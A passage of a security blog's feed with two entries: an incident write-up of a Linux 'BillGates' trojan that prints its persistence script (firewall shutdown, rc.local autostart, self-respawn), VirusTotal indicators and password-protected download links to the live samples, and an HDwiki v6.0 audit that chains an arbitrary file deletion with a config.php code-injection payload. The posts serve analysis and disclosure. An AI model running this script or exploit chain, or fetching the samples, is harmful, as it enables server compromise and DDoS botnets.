class="line"> <span class="built_in">echo</span> <span 
class="string">""</span></span><br><span class="line"> <span class="keyword">fi</span></span><br><span class="line"></span><br><span class="line"> Centos_ssh_killn=$(ps aux | grep <span class="string">"<span class="variable">$host_dir</span>/jourxlv"</span> | grep -v grep | wc -l)</span><br><span class="line"> <span class="keyword">if</span> [[ <span class="variable">$Centos_ssh_killn</span> -eq 0 ]]; <span class="keyword">then</span></span><br><span class="line"> <span class="keyword">if</span> [ ! -f <span class="string">"<span class="variable">$host_dir</span>/jourxlv"</span> ]; <span class="keyword">then</span></span><br><span class="line"> <span class="keyword">if</span> [ -f <span class="string">"/usr/bin/keudl"</span> ]; <span class="keyword">then</span></span><br><span class="line"> cp /usr/bin/keudl <span class="variable">$host_dir</span>/jourxlv</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="built_in">echo</span> <span class="string">"No weeget"</span></span><br><span class="line"> <span class="keyword">fi</span></span><br><span class="line"> <span class="keyword">fi</span></span><br><span class="line"> <span class="variable">$host_dir</span>/jourxlv &</span><br><span class="line"> <span class="keyword">elif</span> [[ <span class="variable">$Centos_ssh_killn</span> -gt 1 ]]; <span class="keyword">then</span></span><br><span class="line"> <span class="keyword">for</span> killed <span class="keyword">in</span> $(ps aux | grep <span class="string">"<span class="variable">$host_dir</span>/jourxlv"</span> | grep -v grep | awk <span class="string">'{print $2}'</span>); <span class="keyword">do</span></span><br><span class="line"> Centos_ssh_killn=$((<span class="variable">$Centos_ssh_killn</span>-<span class="number">1</span>))</span><br><span class="line"> <span class="keyword">if</span> [[ <span class="variable">$Centos_ssh_killn</span> -eq 1 ]]; <span class="keyword">then</span></span><br><span 
class="line"> <span class="built_in">continue</span></span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="built_in">kill</span> -9 <span class="variable">$killed</span></span><br><span class="line"> <span class="keyword">fi</span></span><br><span class="line"> <span class="keyword">done</span></span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="built_in">echo</span> <span class="string">""</span></span><br><span class="line"> <span class="keyword">fi</span></span><br><span class="line"> sleep 600</span><br><span class="line"><span class="keyword">done</span></span><br><span class="line"></span><br></pre></td></tr></table></figure><p>After a rough read-through, the script's operations boil down to:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">service iptables stop > /dev/null 2>&1 &</span><br><span class="line"><span class="built_in">echo</span> <span class="string">"sh <span class="variable">$host_dir</span>/jourxlv &"</span> >> /etc/rc.local</span><br><span class="line">cp sysxlj /usr/bin/aher</span><br><span class="line">cp jourxlv /usr/bin/keudl</span><br><span class="line">cp /usr/bin/keudl <span class="variable">$host_dir</span>/jourxlv</span><br><span class="line">cp /usr/bin/aher <span class="variable">$host_dir</span>/sysxlj</span><br><span class="line">chmod 755 ./sysxlj</span><br><span class="line"><span class="built_in">kill</span> -9 <span class="variable">$killed</span></span><br><span 
class="line"></span><br></pre></td></tr></table></figure><ul><li>Disable the firewall</li><li>Write an autostart entry</li><li>Trojan copies itself</li><li>Script copies itself</li><li>Set permissions and run</li><li>kill to prevent multiple instances from starting</li></ul><p>So at a glance, disabling the firewall means nothing good. Following the copy destinations, sure enough I found <code>aher</code> (<a href="https://pan.baidu.com/s/12boYMeMA0UckrLxGaVHBqw">Baidu Netdisk link, password: wjbq</a>): a Linux executable trojan program starting with ELF. <code>keudl</code> (<a href="https://pan.baidu.com/s/12e6H9sk_ksV50mTi6OrMqw">Baidu Netdisk link, password: 5yrt</a>): the script shown above.</p><h1 id="木马分析"><a href="#木马分析" class="headerlink" title="木马分析"></a>Trojan analysis</h1><p><code>aher</code> was submitted to <a href="https://www.virustotal.com/">virustotal</a> for analysis:</p><h2 id="Detection"><a href="#Detection" class="headerlink" title="Detection"></a>Detection</h2><p><img src="/image/muma/virustotal.png" alt="virustotal.png"></p><p>Most engines flag it as a trojan, backdoor or DDoS tool; a few report it clean...</p><h2 id="Details"><a href="#Details" class="headerlink" title="Details"></a>Details</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">Basic Properties:</span><br><span class="line"></span><br><span class="line">MD5:cb49f9c981bd54d9c67770039a02c383</span><br><span 
class="line">SHA-1:0fee66a1f81e5b924edd593a8f76c9ec424bb668</span><br><span class="line">File Type:ELF</span><br><span class="line">Magic:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped</span><br><span class="line">SSDeep:24576:e845rGHu6gVJKG75oFpA0VWeX4Z2y1q2rJp0:745vRVJKGtSA0VWeoAu9p0</span><br><span class="line">TRiD:ELF Executable and Linkable format (Linux) (50.1%)</span><br><span class="line">ELF Executable and Linkable format (generic) (49.8%)</span><br><span class="line">File Size:1.17 MB</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Tags:</span><br><span class="line"></span><br><span class="line">elf</span><br><span class="line"></span><br><span class="line">History:</span><br><span class="line"></span><br><span class="line">First Seen In The Wild:2010-11-20 23:29:33</span><br><span class="line">First Submission:2018-04-11 18:03:21</span><br><span class="line">Last Submission:2018-04-29 13:26:11</span><br><span class="line">Last Analysis:2018-04-29 13:26:11</span><br><span class="line">File Names:</span><br><span class="line">cb49f9c981bd54d9c67770039a02c383</span><br><span class="line"></span><br></pre></td></tr></table></figure><h2 id="Behavior"><a href="#Behavior" class="headerlink" title="Behavior"></a>Behavior</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span 
class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span 
class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span 
class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br></pre></td><td class="code"><pre><span class="line">Network Communication:</span><br><span class="line"></span><br><span class="line">DNS Resolutions:</span><br><span class="line">fuck999.site</span><br><span class="line"></span><br><span class="line">IP Traffic:</span><br><span class="line"></span><br><span class="line">216.58.203.46:6001 (TCP)</span><br><span class="line">8.8.8.8:53 (UDP)</span><br><span class="line"></span><br><span class="line">File System Actions:</span><br><span class="line"></span><br><span class="line">Files Opened:</span><br><span class="line"></span><br><span class="line">/dev/null</span><br><span class="line">/tmp/gates.lod</span><br><span class="line"></span><br><span class="line">Files Written:</span><br><span class="line"></span><br><span class="line">/tmp/gates.lod</span><br><span class="line"></span><br><span class="line">Process And 
Service Actions:</span><br><span class="line"></span><br><span class="line">Processes Created:</span><br><span class="line"></span><br><span class="line">/tmp/EB93A6/996E.elf</span><br><span class="line">Processes Terminated</span><br><span class="line">/tmp/EB93A6/996E.elf</span><br><span class="line">/lib/systemd/systemd-udevd --daemon</span><br><span class="line"></span><br><span class="line">Highlighted Actions:</span><br><span class="line"></span><br><span class="line">Highlighted Text:</span><br><span class="line"></span><br><span class="line">11CAttackBase</span><br><span class="line">13CPacketAttack</span><br><span class="line">10CAttackUdp</span><br><span class="line">10CAttackSyn</span><br><span class="line">11CAttackIcmp</span><br><span class="line">10CAttackDns</span><br><span class="line">10CAttackAmp</span><br><span class="line">10CAttackPrx</span><br><span class="line">15CAttackCompress</span><br><span class="line">10CTcpAttack</span><br><span class="line">9CAttackCc</span><br><span class="line">10CAttackTns</span><br><span class="line">9CAttackIe</span><br><span class="line">Attack.cpp</span><br><span class="line">_ZTV10CAttackUdp</span><br><span class="line">_ZN9CAttackIe4StopEv</span><br><span class="line">_ZTV10CAttackAmp</span><br><span class="line">_ZTI9CAttackCc</span><br><span class="line">_ZTV9CAttackIe</span><br><span class="line">_ZN10CAttackAmpC1EbR8CSubTaskR7CConfig</span><br><span class="line">_ZN13CPacketAttackD1Ev</span><br><span class="line">_ZN10CAttackDns10MakePacketEj</span><br><span class="line">_ZTV9CAttackCc</span><br><span class="line">_ZN9CAttackCc2DoEj</span><br><span class="line">_ZN14CThreadAtkCtrl10StopAttackEv</span><br><span class="line">_ZTS15CAttackCompress</span><br><span class="line">_ZTV10CAttackDns</span><br><span class="line">_ZN10CAttackTns16UpdateCurVariantEj</span><br><span class="line">_ZN10CAttackSyn10MakePacketEj</span><br><span class="line">_ZN23CThreadKernelAtkExcutor10StopAttackEv</span><br><span 
class="line">_ZN11CAttackBaseD2Ev</span><br><span class="line">_ZTS10CAttackAmp</span><br><span class="line">_ZTI10CAttackAmp</span><br><span class="line">_ZTS10CAttackUdp</span><br><span class="line">_ZN11CAttackIcmpC1EbR8CSubTaskR7CConfig</span><br><span class="line">_ZN10CAttackPrx10MakePacketEj</span><br><span class="line">_ZTS11CAttackIcmp</span><br><span class="line">_ZN10CAttackUdpD1Ev</span><br><span class="line">_ZN11CAttackIcmp10MakePacketEj</span><br><span class="line">_ZN10CAttackUdpC1EbR8CSubTaskR7CConfig</span><br><span class="line">_ZTI11CAttackIcmp</span><br><span class="line">_ZTI10CAttackUdp</span><br><span class="line">_ZN13CPacketAttack6CreateEv</span><br><span class="line">_ZTV13CPacketAttack</span><br><span class="line">_ZN13CPacketAttack7DestroyEv</span><br><span class="line">_ZN10CAttackAmp10MakePacketEj</span><br><span class="line">_ZTI10CAttackPrx</span><br><span class="line">_ZN13CPacketAttack20GetSockTypebyAtkTypeEh</span><br><span class="line">_ZTV11CAttackBase</span><br><span class="line">_ZN10CAttackPrxC1EbR8CSubTaskR7CConfig</span><br><span class="line">_ZN11CAttackIcmpD1Ev</span><br><span class="line">_ZN10CAttackSynD1Ev</span><br><span class="line">_ZN23CThreadNormalAtkExcutor10StopAttackEv</span><br><span class="line">_ZN9CAttackCcD0Ev</span><br><span class="line">_ZN10CAttackUdp10MakePacketEj</span><br><span class="line">_ZN13CPacketAttack14BuildUdpHeaderEPcjjttij</span><br><span class="line">_ZN9CAttackIeD0Ev</span><br><span class="line">_ZTV10CAttackTns</span><br><span class="line">_ZN9CAttackCc4StopEv</span><br><span class="line">_ZTI10CAttackDns</span><br><span class="line">_ZN13CPacketAttackD0Ev</span><br><span class="line">_ZTI10CAttackSyn</span><br><span class="line">_ZN10CTcpAttack6CreateEv</span><br><span class="line">_ZN13CPacketAttack15BuildIcmpHeaderEPcjjij</span><br><span class="line">_ZN11CAttackIcmpD0Ev</span><br><span class="line">_ZN15CAttackCompressD1Ev</span><br><span 
class="line">_ZN10CAttackDnsD1Ev</span><br><span class="line">_ZN10CAttackDns6CreateEv</span><br><span class="line">_ZN13CPacketAttack10SendPacketEv</span><br><span class="line">_ZN10CAttackPrxD0Ev</span><br><span class="line">_ZTV10CTcpAttack</span><br><span class="line">_ZTV15CAttackCompress</span><br><span class="line">_ZN13CPacketAttackC2EbR8CSubTaskR7CConfig</span><br><span class="line">_ZN10CAttackSynC1EbR8CSubTaskR7CConfig</span><br><span class="line">_ZN9CAttackCcD1Ev</span><br><span class="line">_ZN10CAttackAmpD1Ev</span><br><span class="line">_ZN10CAttackPrxD1Ev</span><br><span class="line">_ZN13CPacketAttack4StopEv</span><br><span class="line">_ZN10CAttackAmpD0Ev</span><br><span class="line">_ZTS13CPacketAttack</span><br><span class="line">_ZN10CAttackPrx6CreateEv</span><br><span class="line">_ZN10CTcpAttackD0Ev</span><br><span class="line">_ZTI10CAttackTns</span><br><span class="line">_ZN10CAttackDnsD0Ev</span><br><span class="line">_ZN15CAttackCompress10MakePacketEj</span><br><span class="line">_ZN9CAttackIe16UpdateCurVariantEj</span><br><span class="line">_ZN9CAttackCc6CreateEv</span><br><span class="line">_ZN10CTcpAttack4StopEv</span><br><span class="line">_ZN15CAttackCompressC1EbR8CSubTaskR7CConfig</span><br><span class="line">_ZTS10CTcpAttack</span><br><span class="line">_ZN15CAttackCompressD0Ev</span><br><span class="line">_ZTI10CTcpAttack</span><br><span class="line">_ZN10CAttackTnsD1Ev</span><br><span class="line">_ZN13CPacketAttack14BuildTcpHeaderEPchjjttij</span><br><span class="line">_ZTI11CAttackBase</span><br><span class="line">_ZTS9CAttackIe</span><br><span class="line">_ZN9CAttackCc16UpdateCurVariantEj</span><br><span class="line">_ZN10CTcpAttack7DestroyEv</span><br><span class="line">_ZN9CAttackIe2DoEj</span><br><span class="line">_ZN10CTcpAttack16UpdateCurVariantEj</span><br><span class="line">_ZN10CTcpAttackD1Ev</span><br><span class="line">_ZN10CAttackSynD0Ev</span><br><span class="line">_ZN10CAttackTns6CreateEv</span><br><span 
class="line">_ZTS9CAttackCc</span><br><span class="line">_ZN10CTcpAttack2DoEj</span><br><span class="line">_ZTI9CAttackIe</span><br><span class="line">_ZN10CAttackUdpD0Ev</span><br><span class="line">_ZN13CPacketAttack2DoEj</span><br><span class="line">_ZTV11CAttackIcmp</span><br><span class="line">_ZN10CAttackTnsD0Ev</span><br><span class="line">_ZN10CAttackDnsC1EbR8CSubTaskR7CConfig</span><br><span class="line">_ZTV10CAttackPrx</span><br><span class="line">_ZN9CAttackIe7DestroyEv</span><br><span class="line">_ZTV10CAttackSyn</span><br><span class="line">_ZN10CAttackTnsC1ER8CSubTask</span><br><span class="line">_ZN10CAttackTns7DestroyEv</span><br><span class="line">_ZN15CAttackCompress6CreateEv</span><br><span class="line">_ZN9CAttackCc7DestroyEv</span><br><span class="line">_ZTS10CAttackTns</span><br><span class="line">_ZN10CAttackAmp6CreateEv</span><br><span class="line">_ZN10CAttackTns4StopEv</span><br><span class="line">_ZN9CAttackIeD1Ev</span><br><span class="line">_ZN9CAttackIeC1ER8CSubTask</span><br><span class="line">_ZTS10CAttackDns</span><br><span class="line">_ZN11CAttackBaseD0Ev</span><br><span class="line">_ZN11CAttackBaseC2Ev</span><br><span class="line">_ZTI15CAttackCompress</span><br><span class="line">_ZTI13CPacketAttack</span><br><span class="line">_ZN13CPacketAttack15BuildDnsPayloadEPcbPKcitbtbj</span><br><span class="line">_ZN9CAttackIe6CreateEv</span><br><span class="line">_ZN10CAttackTns2DoEj</span><br><span class="line">_ZTS10CAttackSyn</span><br><span class="line">_ZTS11CAttackBase</span><br><span class="line">_ZN15CAttackCompress13CreatePacketsEv</span><br><span class="line">_ZN11CAttackBaseD1Ev</span><br><span class="line">_ZN13CPacketAttackD2Ev</span><br><span class="line">_ZN13CPacketAttack16UpdateCurVariantEj</span><br><span class="line">_ZN10CTcpAttackC1ER8CSubTask</span><br><span class="line">_ZN9CAttackCcC1ER8CSubTask</span><br><span class="line">_ZTS10CAttackPrx</span><br><span 
class="line"></span><br></pre></td></tr></table></figure><h1 id="最后"><a href="#最后" class="headerlink" title="Finally"></a>Finally</h1><p>Server clean-up</p><p>Remove the autostart tasks and delete <code>/usr/bin/keudl</code>, <code>/usr/bin/aher</code>, <code>/etc/sysxlj</code> and <code>/etc/jourxlv</code>.</p><p>After removing the items above and rebooting, the server behaved much more normally. If that still has no effect, the trojan may have replaced system commands and kept backup copies in several places, so a detailed investigation is needed. The best approach is to keep a system backup or snapshot: when something abnormal is noticed, check whether the hashes still match and use <code>diff</code> to see what was modified. If nothing else works, or there is little of value on the server, reinstall the system to be safe, harden it, and check for vulnerabilities regularly.</p>]]></content>
<summary type="html"><h1 id="起因"><a href="#起因" class="headerlink" title="Cause"></a>Cause</h1><p>In the morning my boss sent over a task: contact the person in charge of a certain server and find out what was going on with it.</p>
<h1 id="经过"><a href="#经过" class</summary>
<category term="BillGates" scheme="https://cr4ckm3.top/tags/BillGates/"/>
<category term="木马分析" scheme="https://cr4ckm3.top/tags/%E6%9C%A8%E9%A9%AC%E5%88%86%E6%9E%90/"/>
</entry>
<entry>
<title>HDwiki v6.0 backend getshell</title>
<link href="https://cr4ckm3.top/2018/04/25/HDwiki_v6.0_%E5%90%8E%E5%8F%B0getshell/"/>
<id>https://cr4ckm3.top/2018/04/25/HDwiki_v6.0_%E5%90%8E%E5%8F%B0getshell/</id>
<published>2018-04-25T14:37:54.000Z</published>
<updated>2019-08-30T10:00:42.023Z</updated>
<content type="html"><![CDATA[<ul><li>A code audit with little technical depth; I am just writing it up as a matter of good habit, since looking back at earlier reasoning and spotting its problems is itself a form of progress.</li></ul><span id="more"></span><h1 id="任意文件删除"><a href="#任意文件删除" class="headerlink" title="Arbitrary file deletion"></a>Arbitrary file deletion</h1><p>File location: <code>control/admin_filemanager.php</code>, lines <code>156-172</code>:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// delete a file or directory</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">dodelete</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="keyword">$this</span>->post[<span class="string">'currentdir'</span>]) && <span class="keyword">isset</span>(<span class="keyword">$this</span>->post[<span class="string">'fname'</span>])){</span><br><span class="line"><span class="variable">$fname</span>=<span class="keyword">string</span>::hstripslashes(<span class="keyword">$this</span>->post[<span class="string">'currentdir'</span>]).<span class="keyword">$this</span>->post[<span class="string">'fname'</span>];</span><br><span class="line">}</span><br><span class="line"><span class="keyword">if</span>(!file_exists(<span class="variable">$fname</span>)){</span><br><span class="line"><span class="keyword">echo</span> <span 
class="keyword">$this</span>->view->lang[<span class="string">'file_not_exist'</span>];</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">$this</span>->post[<span class="string">'isdir'</span>]== <span class="string">'0'</span>){</span><br><span class="line">@unlink(<span class="variable">$fname</span>);</span><br><span class="line"><span class="keyword">echo</span> basename(<span class="variable">$fname</span>).<span class="keyword">$this</span>->view->lang[<span class="string">'file_delete_success'</span>];</span><br><span class="line">}<span class="keyword">else</span> <span class="keyword">if</span>(<span class="keyword">$this</span>->post[<span class="string">'isdir'</span>] == <span class="string">'1'</span>){</span><br><span class="line"><span class="variable">$str</span>=<span class="variable">$_ENV</span>[<span class="string">'dir'</span>]->dir_delete(<span class="variable">$fname</span>);</span><br><span class="line"><span class="keyword">echo</span> basename(<span class="variable">$fname</span>).<span class="string">":"</span>.<span class="keyword">$this</span>->view->lang[<span class="string">'dir_delete_success'</span>];</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>It only checks that the POST parameters <code>currentdir</code> and <code>fname</code> are set and that the file exists; the path is never restricted before the delete is carried out.</p><p>So the <code>data/install.lock</code> file can be deleted directly.</p><p>Find the place that calls into <code>control/admin_filemanager.php</code> and perform the delete there:</p><p><img src="/image/hdwiki/delfile.png" alt="dodelete"></p><ul><li>Result:</li></ul><p><img src="/image/hdwiki/delfile2.png" alt="dodelete2"></p><h1 id="Getshell"><a href="#Getshell" class="headerlink" title="Getshell"></a>Getshell</h1><p>File location: <code>install/install.php</code>, lines <code>288-308</code>:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">break</span>;</span><br><span class="line"><span class="keyword">case</span> <span class="number">3</span> :</span><br><span class="line"><span class="variable">$saveconfig</span>=<span class="variable">$_REQUEST</span>[<span class="string">'saveconfig'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$saveconfig</span>==<span class="string">'1'</span>){</span><br><span class="line"><span class="comment">//db parameter</span></span><br><span class="line"><span class="variable">$dbhost</span> = trim(<span class="variable">$_POST</span>[<span class="string">'dbhost'</span>]);</span><br><span class="line"><span class="variable">$dbuser</span> = trim(<span class="variable">$_POST</span>[<span class="string">'dbuser'</span>]);</span><br><span class="line"><span class="variable">$dbpassword</span> = trim(<span class="variable">$_POST</span>[<span class="string">'dbpassword'</span>]);</span><br><span class="line"><span class="variable">$dbname</span> = trim(<span class="variable">$_POST</span>[<span class="string">'dbname'</span>]);</span><br><span class="line"><span class="variable">$table_prefix</span> = trim(<span 
class="variable">$_POST</span>[<span class="string">'table_prefix'</span>]);</span><br><span class="line"></span><br><span class="line"><span class="comment">// write the received values into the CONFIG file for display</span></span><br><span class="line"><span class="keyword">if</span> (is_writeable(<span class="variable">$configfile</span>) || (!file_exists(<span class="variable">$configfile</span>))) {</span><br><span class="line"><span class="variable">$configcontent</span> = <span class="string">"<?php</span></span><br><span class="line"><span class="string">define('DB_HOST', '"</span>.<span class="variable">$dbhost</span>.<span class="string">"');</span></span><br><span class="line"><span class="string">define('DB_USER', '"</span>.<span class="variable">$dbuser</span>.<span class="string">"');</span></span><br><span class="line"><span class="string">define('DB_PW', '"</span>.<span class="variable">$dbpassword</span>.<span class="string">"');</span></span><br><span class="line"><span class="string">define('DB_NAME', '"</span>.<span class="variable">$dbname</span>.<span class="string">"');</span></span><br><span class="line"><span class="string">define('DB_TABLEPRE', '"</span>.<span class="variable">$table_prefix</span>.<span class="string">"');</span></span><br><span class="line"><span class="string">define('WIKI_URL', '"</span>.<span class="variable">$site_url</span>.<span class="string">"');</span></span><br><span class="line"><span class="string">?>"</span>;</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>The values of <code>$dbhost</code> and the others are only passed through <code>trim()</code>, and are then written into <code>config.php</code> as constant definitions.</p><p>Now look at <code>config.php</code>:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span 
class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line">define(<span class="string">'DB_HOST'</span>, <span class="string">'localhost'</span>);</span><br><span class="line"></span><br><span class="line">define(<span class="string">'DB_USER'</span>, <span class="string">'root'</span>);</span><br><span class="line"></span><br><span class="line">define(<span class="string">'DB_PW'</span>, <span class="string">'root'</span>);</span><br><span class="line"></span><br><span class="line">define(<span class="string">'DB_NAME'</span>, <span class="string">'wiki'</span>);</span><br><span class="line"></span><br><span class="line">define(<span class="string">'DB_CHARSET'</span>, <span class="string">'utf8'</span>);</span><br><span class="line"></span><br><span class="line">define(<span class="string">'DB_TABLEPRE'</span>, <span class="string">'wiki_'</span>);</span><br><span class="line"></span><br><span class="line">define(<span class="string">'DB_CONNECT'</span>, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">define(<span class="string">'WIKI_FOUNDER'</span>, <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">define(<span class="string">'WIKI_CHARSET'</span>, <span class="string">'UTF-8'</span>);</span><br><span class="line"></span><br><span class="line">define(<span 
class="string">'WIKI_URL'</span>, <span class="string">'http://127.0.0.1/hdwiki/v6.0'</span>);</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><ul><li>Constructing the POC</li></ul><p><img src="/image/hdwiki/poc.png" alt="poc"></p><p>In the database server field we can simply enter <code>localhost');phpinfo();//</code>.</p><ul><li>Result</li></ul><p>Visit <code>config.php</code>:</p><p><img src="/image/hdwiki/getshell.png" alt="getshell"></p>]]></content>
<summary type="html"><ul>
<li>A code audit with little technical depth; I am just writing it up as a matter of good habit, since looking back at earlier reasoning and spotting its problems is itself a form of progress.</li>
</ul></summary>
<category term="代码审计" scheme="https://cr4ckm3.top/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
<category term="CMS" scheme="https://cr4ckm3.top/tags/CMS/"/>
</entry>
<entry>
<title>PbootCMS v0.9.8 backend Getshell</title>
<link href="https://cr4ckm3.top/2018/04/11/pbootcms/"/>
<id>https://cr4ckm3.top/2018/04/11/pbootcms/</id>
<published>2018-04-11T15:50:00.000Z</published>
<updated>2019-08-30T10:00:41.103Z</updated>
